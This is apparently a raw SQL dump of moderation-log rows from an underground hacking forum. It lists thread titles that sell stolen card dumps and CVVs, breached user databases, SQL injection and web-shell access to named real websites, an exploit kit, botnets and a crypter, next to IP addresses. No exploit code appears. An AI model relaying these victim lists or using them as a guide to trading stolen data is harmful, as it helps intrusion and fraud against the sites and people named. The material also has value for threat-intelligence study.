(523, 1457983110, 173, 37, 2483, 2988, 0, 0, 'topface.com', 20, 'topface.com', '173.245.54.190', '', 0, 0, 0, 0, 0),
(524, 1457983204, 173, 37, 2458, 2938, 0, 0, 'Very Fresh Update done 100% VALIDITY DUMPZ(track1&2, D+P), FULLZ, CVV and more', 20, 'Very Fresh Update done 100% VALIDITY DUMPZ(track1&2, D+P), FULLZ, CVV and more', '173.245.54.190', '', 0, 0, 0, 0, 0),
(525, 1457983306, 173, 37, 2403, 2911, 0, 0, 'Comcast DB 590K users/plaintext passwords', 20, 'Comcast DB 590K users/plaintext passwords', '173.245.54.190', '', 0, 0, 0, 0, 0),
(526, 1457983369, 173, 37, 2401, 2909, 0, 0, 'Skimmed dumps,ccv,fullz,logins etc for sale', 20, 'Skimmed dumps,ccv,fullz,logins etc for sale', '173.245.54.190', '', 0, 0, 0, 0, 0),
(527, 1457983445, 173, 37, 2392, 2878, 0, 0, 'forum-seo.net', 20, '', '173.245.54.190', '', 0, 0, 0, 0, 0),
(528, 1457983541, 173, 37, 2315, 2782, 0, 0, 'Selling FTR (court software) forum DB!', 20, 'Selling FTR (court software) forum DB!', '173.245.54.190', '', 0, 0, 0, 0, 0),
(529, 1457983702, 173, 38, 1856, 2288, 0, 0, 'Hunter ExploitKit', 20, 'Hunter ExploitKit', '173.245.54.190', '', 0, 0, 0, 0, 0),
(530, 1457983729, 173, 38, 1856, 2843, 0, 0, '', 20, 'Hunter ExploitKit', '173.245.54.190', '', 0, 0, 0, 0, 0),
(531, 1457983829, 173, 38, 2412, 0, 0, 0, '', 1, '', '173.245.54.190', '', 0, 0, 0, 0, 0),
(532, 1457983829, 173, 38, 2411, 0, 0, 0, '', 23, 'w0rm Help', '173.245.54.190', '', 0, 0, 0, 0, 0),
(533, 1457983848, 173, 38, 2411, 2922, 0, 0, 'w0rm Help', 20, 'w0rm Help', '173.245.54.190', '', 0, 0, 0, 0, 0),
(534, 1457983915, 173, 32, 2237, 2699, 0, 0, 'Отработка Ваших дампов', 20, 'Отработка Ваших дампов', '173.245.54.190', '', 0, 0, 0, 0, 0),
(535, 1457983969, 173, 32, 2473, 2963, 0, 0, 'I Sell Cvv,Bank transfer,Atm Skimmer,tRACK 1&2,Banklogins,Atm plastic cards,ETC Repla', 20, 'I Sell Cvv,Bank transfer,Atm Skimmer,tRACK 1&2,Banklogins,Atm plastic cards,ETC Repla', '173.245.54.190', '', 0, 0, 0, 0, 0),
(536, 1457984060, 173, 32, 2414, 2926, 0, 0, 'I am good seller for eu,usa,canada dumps only .', 20, 'I am good seller for eu,usa,canada dumps only .', '173.245.54.190', '', 0, 0, 0, 0, 0),
(537, 1457984080, 173, 32, 2395, 2884, 0, 0, 'w0rm vds/vps', 20, 'w0rm vds/vps', '173.245.54.190', '', 0, 0, 0, 0, 0),
(538, 1457984169, 173, 35, 2379, 2846, 0, 0, 'gamevil.com', 20, 'gamevil.com', '173.245.54.190', '', 0, 0, 0, 0, 0),
(539, 1457984206, 173, 35, 2477, 2967, 0, 0, 'доступ по ssh на сервер cimco-software', 20, 'доступ по ssh на сервер cimco-software', '173.245.54.190', '', 0, 0, 0, 0, 0),
(540, 1457984431, 173, 35, 2468, 2956, 0, 0, '[shop+sql] уязвимость', 20, '[shop+sql] уязвимость', '173.245.54.190', '', 0, 0, 0, 0, 0),
(541, 1457984928, 173, 35, 2462, 2945, 0, 0, 'sqli+web-shell arduino.org', 20, 'sqli+web-shell arduino.org', '173.245.54.190', '', 0, 0, 0, 0, 0),
(542, 1457985376, 173, 35, 2460, 2943, 0, 0, 'mlg.ru - shell+src', 20, 'mlg.ru - shell+src', '173.245.54.190', '', 0, 0, 0, 0, 0),
(543, 1457985393, 173, 35, 2459, 2941, 0, 0, '14k ftp/adm from megaindex.', 20, '14k ftp/adm from megaindex.', '173.245.54.190', '', 0, 0, 0, 0, 0),
(544, 1457985434, 173, 35, 2419, 2934, 0, 0, '[shell]*.lada.ru', 20, '[shell]*.lada.ru', '173.245.54.190', '', 0, 0, 0, 0, 0),
(545, 1457985454, 173, 35, 2416, 2928, 0, 0, '[src+shell] *.megaindex.ru', 20, '[src+shell] *.megaindex.ru', '173.245.54.190', '', 0, 0, 0, 0, 0),
(546, 1457985517, 173, 35, 2390, 2875, 0, 0, 'http://www.mashailalqasr.com', 20, 'http://www.mashailalqasr.com', '173.245.54.190', '', 0, 0, 0, 0, 0),
(547, 1457985536, 173, 35, 2391, 2876, 0, 0, 'missgrandinternational.com', 20, 'missgrandinternational.com', '173.245.54.190', '', 0, 0, 0, 0, 0),
(548, 1457985558, 173, 35, 2393, 2879, 0, 0, 'zebra.nsk.ru', 20, 'zebra.nsk.ru', '173.245.54.190', '', 0, 0, 0, 0, 0),
(549, 1457985600, 173, 35, 2380, 2847, 0, 0, 'jdwetherspoon.co.uk', 20, 'jdwetherspoon.co.uk', '173.245.54.190', '', 0, 0, 0, 0, 0),
(550, 1457985614, 173, 35, 2381, 2848, 0, 0, 'lgbt.lt', 20, 'lgbt.lt', '173.245.54.190', '', 0, 0, 0, 0, 0),
(551, 1457985637, 173, 35, 2382, 2849, 0, 0, 'funimation.com', 20, 'funimation.com', '173.245.54.190', '', 0, 0, 0, 0, 0),
(552, 1457985747, 173, 35, 2368, 2830, 0, 0, 'torrent.tlt.ru', 20, 'torrent.tlt.ru', '173.245.54.190', '', 0, 0, 0, 0, 0),
(553, 1457985767, 173, 35, 2369, 2831, 0, 0, 'mega-torrent.ru', 20, 'mega-torrent.ru', '173.245.54.190', '', 0, 0, 0, 0, 0),
(554, 1457985792, 173, 35, 2371, 2833, 0, 0, 'polisportal.ru', 20, 'polisportal.ru', '173.245.54.190', '', 0, 0, 0, 0, 0),
(555, 1457985820, 173, 35, 2375, 2840, 0, 0, 'galaxybis.com', 20, 'galaxybis.com', '173.245.54.190', '', 0, 0, 0, 0, 0),
(556, 1457985831, 173, 35, 2385, 2853, 0, 0, 'lorealparis.com.cn', 20, 'lorealparis.com.cn', '173.245.54.190', '', 0, 0, 0, 0, 0),
(557, 1457985845, 173, 35, 2384, 2852, 0, 0, 'sferos.one.lt', 20, 'sferos.one.lt', '173.245.54.190', '', 0, 0, 0, 0, 0),
(558, 1457985865, 173, 35, 2383, 2851, 0, 0, '', 20, 'totallywicked-eliquid.com/de/co.uk/jp', '173.245.54.190', '', 0, 0, 0, 0, 0),
(559, 1457985902, 173, 35, 2356, 2811, 0, 0, 'biogents.com', 20, 'biogents.com', '173.245.54.190', '', 0, 0, 0, 0, 0),
(560, 1457985927, 173, 35, 2354, 2809, 0, 0, 'lodka.com.ua', 20, 'lodka.com.ua', '173.245.54.190', '', 0, 0, 0, 0, 0),
(561, 1457985976, 173, 35, 2391, 2876, 0, 0, 'missgrandinternational.com', 20, 'missgrandinternational.com', '173.245.54.190', '', 0, 0, 0, 0, 0),
(562, 1457986051, 173, 35, 2477, 2967, 0, 0, 'доступ по ssh на сервер cimco-software', 20, 'доступ по ssh на сервер cimco-software', '173.245.54.190', '', 0, 0, 0, 0, 0),
(563, 1457986080, 173, 35, 2390, 2875, 0, 0, 'http://www.mashailalqasr.com', 20, 'http://www.mashailalqasr.com', '173.245.54.190', '', 0, 0, 0, 0, 0),
(564, 1457986090, 173, 35, 2393, 2879, 0, 0, 'zebra.nsk.ru', 20, 'zebra.nsk.ru', '173.245.54.190', '', 0, 0, 0, 0, 0),
(565, 1457986108, 173, 35, 2375, 2840, 0, 0, 'galaxybis.com', 20, 'galaxybis.com', '173.245.54.190', '', 0, 0, 0, 0, 0),
(566, 1457986188, 173, 35, 2371, 2833, 0, 0, 'polisportal.ru', 20, 'polisportal.ru', '173.245.54.190', '', 0, 0, 0, 0, 0),
(567, 1457986200, 173, 35, 2371, 2833, 0, 0, 'polisportal.ru', 20, 'polisportal.ru', '173.245.54.190', '', 0, 0, 0, 0, 0),
(568, 1457986283, 173, 35, 2369, 2831, 0, 0, 'mega-torrent.ru', 20, 'mega-torrent.ru', '173.245.54.190', '', 0, 0, 0, 0, 0),
(569, 1457986294, 173, 35, 2368, 2830, 0, 0, 'torrent.tlt.ru', 20, 'torrent.tlt.ru', '173.245.54.190', '', 0, 0, 0, 0, 0),
(570, 1457986333, 173, 35, 2354, 2809, 0, 0, 'lodka.com.ua', 20, 'lodka.com.ua', '173.245.54.190', '', 0, 0, 0, 0, 0),
(571, 1459090735, 100, 32, 2499, 0, 0, 0, '', 14, 'Our bot', '5.141.8.136', '', 0, 0, 0, 0, 0),
(572, 1462795723, 1, 39, 2415, 0, 0, 0, '', 15, 'продам mayhem — многоцелевой бот для *nix-серверов', '46.165.230.39', '', 0, 0, 0, 0, 0),
(573, 1463695657, 100, 32, 2473, 0, 0, 0, '', 15, 'I Sell Cvv,Bank transfer,Atm Skimmer,tRACK 1&2,Banklogins,Atm plastic cards,ETC Repla', '5.220.255.27', '', 0, 0, 0, 0, 0),
(574, 1463695755, 100, 32, 2386, 0, 0, 0, '', 15, 'Реализация кредитных карт (cvv)', '5.220.255.27', '', 0, 0, 0, 0, 0),
(575, 1463695755, 100, 32, 2414, 0, 0, 0, '', 15, 'I am good seller for eu,usa,canada dumps only .', '5.220.255.27', '', 0, 0, 0, 0, 0),
(576, 1463695755, 100, 32, 2457, 0, 0, 0, '', 15, 'Very Fresh Update done 100% VALIDITY DUMPZ(track1&2, D+P), FULLZ, CVV and more', '5.220.255.27', '', 0, 0, 0, 0, 0),
(577, 1463695755, 100, 32, 2470, 0, 0, 0, '', 15, '[Course] Audit Web Resources', '5.220.255.27', '', 0, 0, 0, 0, 0),
(578, 1463695755, 100, 32, 2482, 0, 0, 0, '', 15, 'Botnet with admin panel on remote servers and distribution', '5.220.255.27', '', 0, 0, 0, 0, 0),
(579, 1463695755, 100, 32, 2496, 0, 0, 0, '', 15, 'Looking for Banking Trojan', '5.220.255.27', '', 0, 0, 0, 0, 0),
(580, 1463695755, 100, 32, 2498, 0, 0, 0, '', 15, 'spammer needed', '5.220.255.27', '', 0, 0, 0, 0, 0),
(581, 1463695766, 100, 32, 2499, 0, 0, 0, '', 15, 'Our bot', '5.220.255.27', '', 0, 0, 0, 0, 0),
(582, 1463695790, 100, 32, 2234, 0, 0, 0, '', 15, 'Carder-club.su', '5.220.255.27', '', 0, 0, 0, 0, 0),
(583, 1463695790, 100, 32, 2237, 0, 0, 0, '', 15, 'Отработка Ваших дампов', '5.220.255.27', '', 0, 0, 0, 0, 0),
(584, 1463695790, 100, 32, 2395, 0, 0, 0, '', 15, 'w0rm vds/vps', '5.220.255.27', '', 0, 0, 0, 0, 0),
(585, 1463695832, 100, 38, 2318, 0, 0, 0, '', 15, 'Selling SEO forum (very active)!', '5.220.255.27', '', 0, 0, 0, 0, 0),
(586, 1463695832, 100, 38, 2402, 0, 0, 0, '', 15, 'Skimmed dumps,ccv,fullz,logins etc for sale', '5.220.255.27', '', 0, 0, 0, 0, 0),
(587, 1463695832, 100, 38, 2411, 0, 0, 0, '', 15, 'w0rm Help', '5.220.255.27', '', 0, 0, 0, 0, 0),
(588, 1463695832, 100, 38, 2412, 0, 2411, 0, '', 30, '', '5.220.255.27', '', 0, 0, 0, 0, 0),
(589, 1463695832, 100, 38, 2461, 0, 0, 0, '', 15, 'Срочно нужны обьем акков турбо такс!!!!', '5.220.255.27', '', 0, 0, 0, 0, 0),
(590, 1463695832, 100, 38, 2479, 0, 0, 0, '', 15, '[Looking For] Socks5 Bot Coding Partner (for a friend)', '5.220.255.27', '', 0, 0, 0, 0, 0),
(591, 1463695889, 100, 37, 2315, 0, 0, 0, '', 15, 'Selling FTR (court software) forum DB!', '5.220.255.27', '', 0, 0, 0, 0, 0),
(592, 1463695889, 100, 37, 2401, 0, 0, 0, '', 15, 'Skimmed dumps,ccv,fullz,logins etc for sale', '5.220.255.27', '', 0, 0, 0, 0, 0),
(593, 1463695889, 100, 37, 2403, 0, 0, 0, '', 15, 'Comcast DB 590K users/plaintext passwords', '5.220.255.27', '', 0, 0, 0, 0, 0),
(594, 1463695889, 100, 37, 2404, 0, 0, 0, '', 15, 'ComCast DB 590k users/plaintext passwords', '5.220.255.27', '', 0, 0, 0, 0, 0),
(595, 1463695889, 100, 37, 2458, 0, 0, 0, '', 15, 'Very Fresh Update done 100% VALIDITY DUMPZ(track1&2, D+P), FULLZ, CVV and more', '5.220.255.27', '', 0, 0, 0, 0, 0),
(596, 1463695889, 100, 37, 2467, 0, 0, 0, '', 15, 'Dumps Updates Done With 98% Valid Rate ICQ:7447437', '5.220.255.27', '', 0, 0, 0, 0, 0),
(597, 1463695889, 100, 37, 2472, 0, 0, 0, '', 15, 'I Sell Cvv,Bank transfer,Atm Skimmer,tRACK 1&2,Banklogins,Atm plastic cards,ETC Repla', '5.220.255.27', '', 0, 0, 0, 0, 0),
(598, 1463695889, 100, 37, 2485, 0, 0, 0, '', 15, 'Selling dumps database', '5.220.255.27', '', 0, 0, 0, 0, 0),
(599, 1463695926, 100, 37, 1866, 0, 0, 0, '', 15, '1 миллиард e-mail', '5.220.255.27', '', 0, 0, 0, 0, 0),
(600, 1463695959, 100, 37, 2399, 0, 0, 0, '', 15, 'A collection of Carding guide', '5.220.255.27', '', 0, 0, 0, 0, 0),
(601, 1463695976, 100, 39, 1835, 0, 0, 0, '', 15, 'polymorphic crypter', '5.220.255.27', '', 0, 0, 0, 0, 0),
(602, 1463695991, 100, 36, 2480, 0, 0, 0, '', 15, 'doc 0day', '5.220.255.27', '', 0, 0, 0, 0, 0),
(603, 1463696029, 100, 35, 2379, 0, 0, 0, '', 15, 'gamevil.com', '5.220.255.27', '', 0, 0, 0, 0, 0),
(604, 1463696029, 100, 35, 2389, 0, 0, 0, '', 15, 'http://www.guildvalhall.eu/forums/', '5.220.255.27', '', 0, 0, 0, 0, 0),
(605, 1463696029, 100, 35, 2471, 0, 0, 0, '', 15, 'I Sell Cvv,Bank transfer,Atm Skimmer,tRACK 1&2,Banklogins,Atm plastic cards,ETC Repla', '5.220.255.27', '', 0, 0, 0, 0, 0),
(606, 1463696029, 100, 35, 2474, 0, 0, 0, '', 15, 'I Sell Cvv,Bank transfer,Atm Skimmer,tRACK 1&2,Banklogins,Atm plastic cards,ETC Repla', '5.220.255.27', '', 0, 0, 0, 0, 0),
(607, 1463696029, 100, 35, 2475, 0, 0, 0, '', 15, 'доступ по ssh на сервер cimco', '5.220.255.27', '', 0, 0, 0, 0, 0),
(608, 1463696029, 100, 35, 2476, 0, 0, 0, '', 15, 'доступ по ssh на сервер cimco', '5.220.255.27', '', 0, 0, 0, 0, 0),
(609, 1463696029, 100, 35, 2477, 0, 0, 0, '', 15, 'доступ по ssh на сервер cimco-software', '5.220.255.27', '', 0, 0, 0, 0, 0),
(610, 1463696072, 100, 35, 2312, 0, 0, 0, '', 15, '[SELLING] Smoking shop based in UK (40k entries).', '5.220.255.27', '', 0, 0, 0, 0, 0),
(611, 1463696072, 100, 35, 2313, 0, 0, 0, '', 15, 'Selling Zippo.co.uk (entire DB)', '5.220.255.27', '', 0, 0, 0, 0, 0),
(612, 1463696072, 100, 35, 2314, 0, 0, 0, '', 15, 'Selling SQLI in NETGEAR', '5.220.255.27', '', 0, 0, 0, 0, 0),
(613, 1463696072, 100, 35, 2317, 0, 0, 0, '', 15, 'Selling entire BOINGO DB & SQLI!', '5.220.255.27', '', 0, 0, 0, 0, 0),
(614, 1463696592, 387, 38, 1856, 0, 0, 0, '', 15, 'Hunter ExploitKit', '5.79.68.161', '', 0, 0, 0, 0, 0),
(615, 1463696627, 387, 38, 2490, 0, 0, 0, '', 15, 'BurpSuite Pro v1.6.34', '5.79.68.161', '', 0, 0, 0, 0, 0),
(616, 1463698278, 387, 18, 2491, 0, 0, 0, '', 15, 'Forum Cleanup - New Rules', '176.126.252.12', '', 0, 0, 0, 0, 0),
(617, 1463698490, 387, 18, 2481, 0, 0, 0, '', 15, 'escrow', '176.126.252.12', '', 0, 0, 0, 0, 0),
(618, 1463698602, 387, 18, 1598, 0, 0, 0, '', 15, 'Sql in cnn subdomain', '176.126.252.12', '', 0, 0, 0, 0, 0),
(619, 1463698602, 387, 18, 1627, 0, 0, 0, '', 15, 'игра - разминка [поисÂк xss]', '176.126.252.12', '', 0, 0, 0, 0, 0),
(620, 1463698602, 387, 18, 1637, 0, 0, 0, '', 15, 'хеши!', '176.126.252.12', '', 0, 0, 0, 0, 0),
(621, 1463698602, 387, 18, 1652, 0, 0, 0, '', 15, 'Mini black list;', '176.126.252.12', '', 0, 0, 0, 0, 0),
(622, 1463698602, 387, 18, 1676, 0, 0, 0, '', 15, '"базы" mailru, yandex, gmail', '176.126.252.12', '', 0, 0, 0, 0, 0),
(623, 1463698602, 387, 18, 1734, 0, 0, 0, '', 15, 'котаны кто нибудь впаривал по почте?', '176.126.252.12', '', 0, 0, 0, 0, 0),
(624, 1463698602, 387, 18, 1753, 0, 0, 0, '', 15, 'забавные картини по тематике', '176.126.252.12', '', 0, 0, 0, 0, 0),
(625, 1463698602, 387, 18, 1765, 0, 0, 0, '', 15, 'сервер не выполняет загруженные файлы', '176.126.252.12', '', 0, 0, 0, 0, 0),
(626, 1463698602, 387, 18, 1807, 0, 0, 0, '', 15, 'Local r00t expl0it', '176.126.252.12', '', 0, 0, 0, 0, 0),
(627, 1463698602, 387, 18, 1812, 0, 0, 0, '', 15, 'online shellshock scanner', '176.126.252.12', '', 0, 0, 0, 0, 0),
(628, 1463698602, 387, 18, 1821, 0, 0, 0, '', 15, 'Покупка-продажа', '176.126.252.12', '', 0, 0, 0, 0, 0),
(629, 1463698602, 387, 18, 1829, 0, 0, 0, '', 15, 'У кого отсосать чтобы баге дали cve??', '176.126.252.12', '', 0, 0, 0, 0, 0),
(630, 1463698602, 387, 18, 1832, 0, 0, 0, '', 15, 'welcome back', '176.126.252.12', '', 0, 0, 0, 0, 0),
(631, 1463698602, 387, 18, 1838, 0, 0, 0, '', 15, 'UniqPass', '176.126.252.12', '', 0, 0, 0, 0, 0),
(632, 1463698602, 387, 18, 1839, 0, 0, 0, '', 15, 'Предложения по улучшению форума', '176.126.252.12', '', 0, 0, 0, 0, 0),
(633, 1463698602, 387, 18, 2235, 0, 0, 0, '', 15, 'сломан форум monopoly.ms !', '176.126.252.12', '', 0, 0, 0, 0, 0),
(634, 1463698602, 387, 18, 2388, 0, 0, 0, '', 15, 'darkode returns', '176.126.252.12', '', 0, 0, 0, 0, 0),
(635, 1463698602, 387, 18, 2466, 0, 0, 0, '', 15, 'Актуальные контакты', '176.126.252.12', '', 0, 0, 0, 0, 0),
(636, 1463698602, 387, 18, 2478, 0, 0, 0, '', 15, 'w0rm fund', '176.126.252.12', '', 0, 0, 0, 0, 0),
(637, 1463698602, 387, 18, 2492, 0, 0, 0, '', 15, 'Introduction Guidelines [ENG]', '176.126.252.12', '', 0, 0, 0, 0, 0),
(638, 1463698602, 387, 18, 2493, 0, 0, 0, '', 15, 'Введение Руководство', '176.126.252.12', '', 0, 0, 0, 0, 0),
(639, 1463698602, 387, 18, 2500, 0, 0, 0, '', 15, 'HeLL Forum', '176.126.252.12', '', 0, 0, 0, 0, 0),
(640, 1463699327, 387, 18, 1095, 0, 0, 0, '', 15, 'Может магазин откроем', '77.247.181.162', '', 0, 0, 0, 0, 0),
(641, 1463699327, 387, 18, 1103, 0, 0, 0, '', 15, 'Продажа уяÂзвимосÂтей.', '77.247.181.162', '', 0, 0, 0, 0, 0),
(642, 1463699327, 387, 18, 1112, 0, 0, 0, '', 15, 'Маленькие полезносÂти', '77.247.181.162', '', 0, 0, 0, 0, 0),
(643, 1463699327, 387, 18, 1137, 0, 0, 0, '', 15, 'ищу бд хак/карж порталов.', '77.247.181.162', '', 0, 0, 0, 0, 0),
(644, 1463699327, 387, 18, 1141, 0, 0, 0, '', 15, 'посоны кто шарит в swf?', '77.247.181.162', '', 0, 0, 0, 0, 0),
(645, 1463699327, 387, 18, 1402, 0, 0, 0, '', 15, 'Что делаем дальше?', '77.247.181.162', '', 0, 0, 0, 0, 0),
(646, 1463699417, 387, 24, 2489, 0, 0, 0, '', 15, 'syslink (ex SuperModerator)', '77.247.181.162', '', 0, 0, 0, 0, 0),
(647, 1463758445, 387, 36, 2333, 0, 0, 0, '', 15, '[ddos]Microsoft Remote Desktop', '37.187.129.166', '', 0, 0, 0, 0, 0),
(648, 1463759064, 387, 35, 2380, 0, 0, 0, '', 15, 'jdwetherspoon.co.uk', '37.187.129.166', '', 0, 0, 0, 0, 0),
(649, 1463759064, 387, 35, 2381, 0, 0, 0, '', 15, 'lgbt.lt', '37.187.129.166', '', 0, 0, 0, 0, 0),
(650, 1463759064, 387, 35, 2382, 0, 0, 0, '', 15, 'funimation.com', '37.187.129.166', '', 0, 0, 0, 0, 0),
(651, 1463759064, 387, 35, 2383, 0, 0, 0, '', 15, 'totallywicked-eliquid.com/de/co.uk/jp', '37.187.129.166', '', 0, 0, 0, 0, 0),
(652, 1463759064, 387, 35, 2384, 0, 0, 0, '', 15, 'sferos.one.lt', '37.187.129.166', '', 0, 0, 0, 0, 0),
(653, 1463759064, 387, 35, 2385, 0, 0, 0, '', 15, 'lorealparis.com.cn', '37.187.129.166', '', 0, 0, 0, 0, 0),
(654, 1463759064, 387, 35, 2390, 0, 0, 0, '', 15, 'http://www.mashailalqasr.com', '37.187.129.166', '', 0, 0, 0, 0, 0),
(655, 1463759064, 387, 35, 2391, 0, 0, 0, '', 15, 'missgrandinternational.com', '37.187.129.166', '', 0, 0, 0, 0, 0),
(656, 1463759064, 387, 35, 2393, 0, 0, 0, '', 15, 'zebra.nsk.ru', '37.187.129.166', '', 0, 0, 0, 0, 0),
(657, 1463759064, 387, 35, 2394, 0, 0, 0, '', 15, 'agrobuy.ru', '37.187.129.166', '', 0, 0, 0, 0, 0),
(658, 1463759064, 387, 35, 2396, 0, 0, 0, '', 15, 'univie.ac.at', '37.187.129.166', '', 0, 0, 0, 0, 0),
(659, 1463759064, 387, 35, 2416, 0, 0, 0, '', 15, '[src+shell] *.megaindex.ru', '37.187.129.166', '', 0, 0, 0, 0, 0),
(660, 1463759064, 387, 35, 2419, 0, 0, 0, '', 15, '[shell]*.lada.ru', '37.187.129.166', '', 0, 0, 0, 0, 0),
(661, 1463759064, 387, 35, 2459, 0, 0, 0, '', 15, '14k ftp/adm from megaindex.', '37.187.129.166', '', 0, 0, 0, 0, 0),
(662, 1463759064, 387, 35, 2460, 0, 0, 0, '', 15, 'mlg.ru - shell+src', '37.187.129.166', '', 0, 0, 0, 0, 0),
(663, 1463759064, 387, 35, 2462, 0, 0, 0, '', 15, 'sqli+web-shell arduino.org', '37.187.129.166', '', 0, 0, 0, 0, 0),
(664, 1463759064, 387, 35, 2464, 0, 0, 0, '', 15, 'tomtop.com root + db', '37.187.129.166', '', 0, 0, 0, 0, 0),
(665, 1463759064, 387, 35, 2465, 0, 0, 0, '', 15, 'geolify.com', '37.187.129.166', '', 0, 0, 0, 0, 0),
(666, 1463759064, 387, 35, 2468, 0, 0, 0, '', 15, '[shop+sql] уязвимость', '37.187.129.166', '', 0, 0, 0, 0, 0),
(667, 1463759064, 387, 35, 2487, 0, 0, 0, '', 15, 'cox.com users database', '37.187.129.166', '', 0, 0, 0, 0, 0),
(668, 1463759085, 387, 35, 2331, 0, 0, 0, '', 15, '[sql-inj] com_jvideoclip Joomla', '37.187.129.166', '', 0, 0, 0, 0, 0),
(669, 1463759085, 387, 35, 2332, 0, 0, 0, '', 15, '[SQLi] lk.domru.ru', '37.187.129.166', '', 0, 0, 0, 0, 0),
(670, 1463759085, 387, 35, 2334, 0, 0, 0, '', 15, '[SQLi]Webshop / osCommerce', '37.187.129.166', '', 0, 0, 0, 0, 0),
(671, 1463759085, 387, 35, 2348, 0, 0, 0, '', 15, 'gammies.mtcserver9.com', '37.187.129.166', '', 0, 0, 0, 0, 0),
(672, 1463759085, 387, 35, 2349, 0, 0, 0, '', 15, 'pasadenabusinessassociation.com', '37.187.129.166', '', 0, 0, 0, 0, 0),
(673, 1463759085, 387, 35, 2350, 0, 0, 0, '', 15, 'tecomat.eu', '37.187.129.166', '', 0, 0, 0, 0, 0),
(674, 1463759085, 387, 35, 2351, 0, 0, 0, '', 15, 'geneticsandsociety.org', '37.187.129.166', '', 0, 0, 0, 0, 0),
(675, 1463759085, 387, 35, 2352, 0, 0, 0, '', 15, '39print.ru', '37.187.129.166', '', 0, 0, 0, 0, 0),
(676, 1463759085, 387, 35, 2353, 0, 0, 0, '', 15, 'ban-tawai.com', '37.187.129.166', '', 0, 0, 0, 0, 0),
(677, 1463759085, 387, 35, 2354, 0, 0, 0, '', 15, 'lodka.com.ua', '37.187.129.166', '', 0, 0, 0, 0, 0),
(678, 1463759085, 387, 35, 2355, 0, 0, 0, '', 15, 'gta.com.ua', '37.187.129.166', '', 0, 0, 0, 0, 0),
(679, 1463759085, 387, 35, 2356, 0, 0, 0, '', 15, 'biogents.com', '37.187.129.166', '', 0, 0, 0, 0, 0),
(680, 1463759085, 387, 35, 2365, 0, 0, 0, '', 15, 'imemo.ru', '37.187.129.166', '', 0, 0, 0, 0, 0),
(681, 1463759085, 387, 35, 2366, 0, 0, 0, '', 15, 'scottishscreen.com', '37.187.129.166', '', 0, 0, 0, 0, 0),
(682, 1463759085, 387, 35, 2367, 0, 0, 0, '', 15, 'spbpost.ru', '37.187.129.166', '', 0, 0, 0, 0, 0),
(683, 1463759085, 387, 35, 2368, 0, 0, 0, '', 15, 'torrent.tlt.ru', '37.187.129.166', '', 0, 0, 0, 0, 0),
(684, 1463759085, 387, 35, 2369, 0, 0, 0, '', 15, 'mega-torrent.ru', '37.187.129.166', '', 0, 0, 0, 0, 0),
(685, 1463759085, 387, 35, 2370, 0, 0, 0, '', 15, 'tracker.gln.kiev.ua', '37.187.129.166', '', 0, 0, 0, 0, 0),
(686, 1463759085, 387, 35, 2371, 0, 0, 0, '', 15, 'polisportal.ru', '37.187.129.166', '', 0, 0, 0, 0, 0),
(687, 1463759085, 387, 35, 2375, 0, 0, 0, '', 15, 'galaxybis.com', '37.187.129.166', '', 0, 0, 0, 0, 0),
(688, 1463759123, 387, 35, 1055, 0, 0, 0, '', 14, 'waydate.com', '37.187.129.166', '', 0, 0, 0, 0, 0),
(689, 1463759123, 387, 35, 1151, 0, 0, 0, '', 14, 'Sql inj - https://infraud.cc', '37.187.129.166', '', 0, 0, 0, 0, 0),
(690, 1463759123, 387, 35, 1175, 0, 0, 0, '', 14, 'Tut.by', '37.187.129.166', '', 0, 0, 0, 0, 0),
(691, 1463759123, 387, 35, 1699, 0, 0, 0, '', 14, '[SQLi] www.aok.de 57mil Users', '37.187.129.166', '', 0, 0, 0, 0, 0),
(692, 1463759123, 387, 35, 1735, 0, 0, 0, '', 14, '[SQLi] sgbest shop', '37.187.129.166', '', 0, 0, 0, 0, 0),
(693, 1463759123, 387, 35, 1825, 0, 0, 0, '', 14, '*.tomsk.ru', '37.187.129.166', '', 0, 0, 0, 0, 0),
(694, 1463759123, 387, 35, 1827, 0, 0, 0, '', 14, 'mastercard', '37.187.129.166', '', 0, 0, 0, 0, 0),
(695, 1463759123, 387, 35, 1828, 0, 0, 0, '', 14, '*.dlink.ru', '37.187.129.166', '', 0, 0, 0, 0, 0),
(696, 1463759123, 387, 35, 1831, 0, 0, 0, '', 14, 'Kuplu CVE-2014-6369 (will buy)', '37.187.129.166', '', 0, 0, 0, 0, 0),
(697, 1463759123, 387, 35, 1833, 0, 0, 0, '', 14, 'ИнтересÂен Whatsapp', '37.187.129.166', '', 0, 0, 0, 0, 0),
(698, 1463759123, 387, 35, 1836, 0, 0, 0, '', 14, 'easyanticheat.net', '37.187.129.166', '', 0, 0, 0, 0, 0),
(699, 1463759123, 387, 35, 1837, 0, 0, 0, '', 14, 'AntiCloudFlare or how to detedt real IP', '37.187.129.166', '', 0, 0, 0, 0, 0),
(700, 1463759123, 387, 35, 1850, 0, 0, 0, '', 14, 'cpanels & shells', '37.187.129.166', '', 0, 0, 0, 0, 0),
(701, 1463759123, 387, 35, 1857, 0, 0, 0, '', 14, 'sqlmap output', '37.187.129.166', '', 0, 0, 0, 0, 0),
(702, 1463759123, 387, 35, 1860, 0, 0, 0, '', 14, 'neal-schuman.com', '37.187.129.166', '', 0, 0, 0, 0, 0),
(703, 1463759123, 387, 35, 1863, 0, 0, 0, '', 14, 'lakedirectory.net', '37.187.129.166', '', 0, 0, 0, 0, 0),
(704, 1463759123, 387, 35, 1867, 0, 0, 0, '', 14, 'norfolkadmirals.com', '37.187.129.166', '', 0, 0, 0, 0, 0),
(705, 1463759123, 387, 35, 2236, 0, 0, 0, '', 14, 'gigabyte.com SQLi', '37.187.129.166', '', 0, 0, 0, 0, 0),
(706, 1463759123, 387, 35, 2329, 0, 0, 0, '', 14, '[sql-inj] *.ppt.ru', '37.187.129.166', '', 0, 0, 0, 0, 0),
(707, 1463759123, 387, 35, 2330, 0, 0, 0, '', 14, '[SQLi+Base]hostinger.ru', '37.187.129.166', '', 0, 0, 0, 0, 0),
(708, 1463759145, 387, 35, 1055, 0, 0, 0, '', 15, 'waydate.com', '37.187.129.166', '', 0, 0, 0, 0, 0),
(709, 1463759145, 387, 35, 1151, 0, 0, 0, '', 15, 'Sql inj - https://infraud.cc', '37.187.129.166', '', 0, 0, 0, 0, 0),
(710, 1463759145, 387, 35, 1175, 0, 0, 0, '', 15, 'Tut.by', '37.187.129.166', '', 0, 0, 0, 0, 0),
(711, 1463759145, 387, 35, 1699, 0, 0, 0, '', 15, '[SQLi] www.aok.de 57mil Users', '37.187.129.166', '', 0, 0, 0, 0, 0),
(712, 1463759145, 387, 35, 1735, 0, 0, 0, '', 15, '[SQLi] sgbest shop', '37.187.129.166', '', 0, 0, 0, 0, 0),
